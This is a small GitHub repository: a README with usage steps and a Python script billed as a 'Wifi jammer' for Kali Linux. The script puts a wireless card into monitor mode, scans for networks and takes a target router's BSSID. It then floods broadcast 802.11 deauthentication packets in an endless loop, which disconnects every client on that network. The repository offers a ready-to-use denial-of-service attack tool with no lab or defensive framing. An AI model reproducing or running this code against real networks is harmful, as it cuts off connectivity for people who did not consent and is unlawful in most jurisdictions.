├── .gitattributes ├── README.md ├── .gitignore └── sidtubejammer.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Wifi jammer service 2 | ## MADE IN AND FOR KALI LINUX 3 | ### watch tutorial on youtube https://youtu.be/0FLOylOdZQo 4 | ### Steps to use 5 | * insert wifiadapter if in Virtual machine 6 | * clone the repo using command 'git clone https://github.com/cimplesid/Wifi-jammer-service.git' 7 | * cd Wifi-jammer-service 8 | run using admistrator privilage 9 | * chmod +x sidtubejammer.py 10 | * python sidtubejammer.py 11 | ![xxx](https://user-images.githubusercontent.com/29953052/39392114-aac91e78-4acf-11e8-9e55-c279e6d97ea0.JPG) 12 | 13 | * after you choose the interface and monitor mode is enabled check name of interface if it is wlan0 then it is ok else 14 | 15 | 'leafpad sidtubejammer.py' 16 | * edit on line 21 wlan0 to your name and save the script and run again. 17 | 18 | . 19 | . 20 | . 21 | . 22 | . 23 | . 24 | . 25 | *copyright@sidtube* 26 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *.cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # Jupyter Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # SageMath parsed files 79 | *.sage.py 80 | 81 | # Environments 82 | .env 83 | .venv 84 | env/ 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | .spyproject 91 | 92 | # Rope project settings 93 | .ropeproject 94 | 95 | # mkdocs documentation 96 | /site 97 | 98 | # mypy 99 | .mypy_cache/ 100 | -------------------------------------------------------------------------------- /sidtubejammer.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * #Importing Scapy allows me Deauthenticate everyone from a target network 2 | import subprocess #Importing subprocess because it allows me to call certain commands in the terminal, such as airmon-ng and airodump-ng 3 | 4 | subprocess.call('clear', shell=True) #Clear the terminal screen 5 | print('.........................................') 6 | print('Deauther/WIFI JAMMER V1.0 BY SIDTUBE') 7 | print('\n'*3) 8 | print('Now listing available network cards') 9 | print('\n'*3) 10 | print('.........................................') 11 | subprocess.call('airmon-ng', shell=True) #Call airmon-ng to show the user a list of available network cards on their device 12 | 13 | print('\n'*3) 14 | #start up monitor mode on a network card 15 | networkCard = raw_input('Please enter the name of the network card you wish to use: ') 16 | 17 | #Start monitor mode on the selected device and run 'airmon-ng check kill' to kill of any processes that may be interfering with the network card 18 | subprocess.call('airmon-ng start {}'.format(networkCard), shell=True) 19 | subprocess.call('airmon-ng check kill', shell=True) 20 | 21 | networkCard = 'wlan0' #you can set your custom name of interface eg: 'wlan0mon' 22 | #try to scan for available network cards on the device 23 | try: 24 | subprocess.call('clear', shell=True) #Clear the terminal screen 25 | print('Now scanning for available networks, press ctrl+c to exit the scan') 26 | subprocess.call('airodump-ng {}'.format(networkCard), shell=True) #Use airodump-ng to start scanning for available networks 27 | except KeyboardInterrupt: #If the user tries to end the program with ctrl+c then the program will pick this up and continue running the rest of the code, so that the user is able to see the output of the scan 28 | print(''*3) 29 | 30 | 31 | brdMac = 'ff:ff:ff:ff:ff:ff' #brdMac is the broadcast macaddress variable, we set it to all f's because we want to hide where we are sending the packets from 32 | BSSID = raw_input('Please enter the BSSID/MAC address of the AP: ') #Let the user input the MAC address of the router 33 | print('Sending deauth packets now, press ctrl+c to end the attack') 34 | print(''*5) 35 | 36 | #try to send deauth packets to the target 37 | try: 38 | #infinite loop to keep the attack running forever, this loop is for setting up the deauth packet and sending it 39 | while True: 40 | #This creates a Dot11Deauth packet that will be used to kick everyone of the target network 41 | #Addr1 is the broadcast addr 42 | #Addr2 is the target addr 43 | #Addr3 is used to target specific clients but I set it to the target addr to kick everyone off the network 44 | pkt = RadioTap() / Dot11(addr1=brdMac, addr2=BSSID, addr3=BSSID)/ Dot11Deauth() 45 | sendp(pkt, iface = networkCard, count = 100000000, inter = .001) #Send deauth packet 46 | except KeyboardInterrupt: #Caputer the user pressing crtl+c to exit the program. Then the code stops monitor mode on the network card and closes out 47 | print('Cleaning up...') 48 | subprocess.call('airmon-ng stop {}'.format(networkCard), shell=True) #stop monitor mode on the network card 49 | subprocess.call('clear', shell=True) #Clear terminal window 50 | --------------------------------------------------------------------------------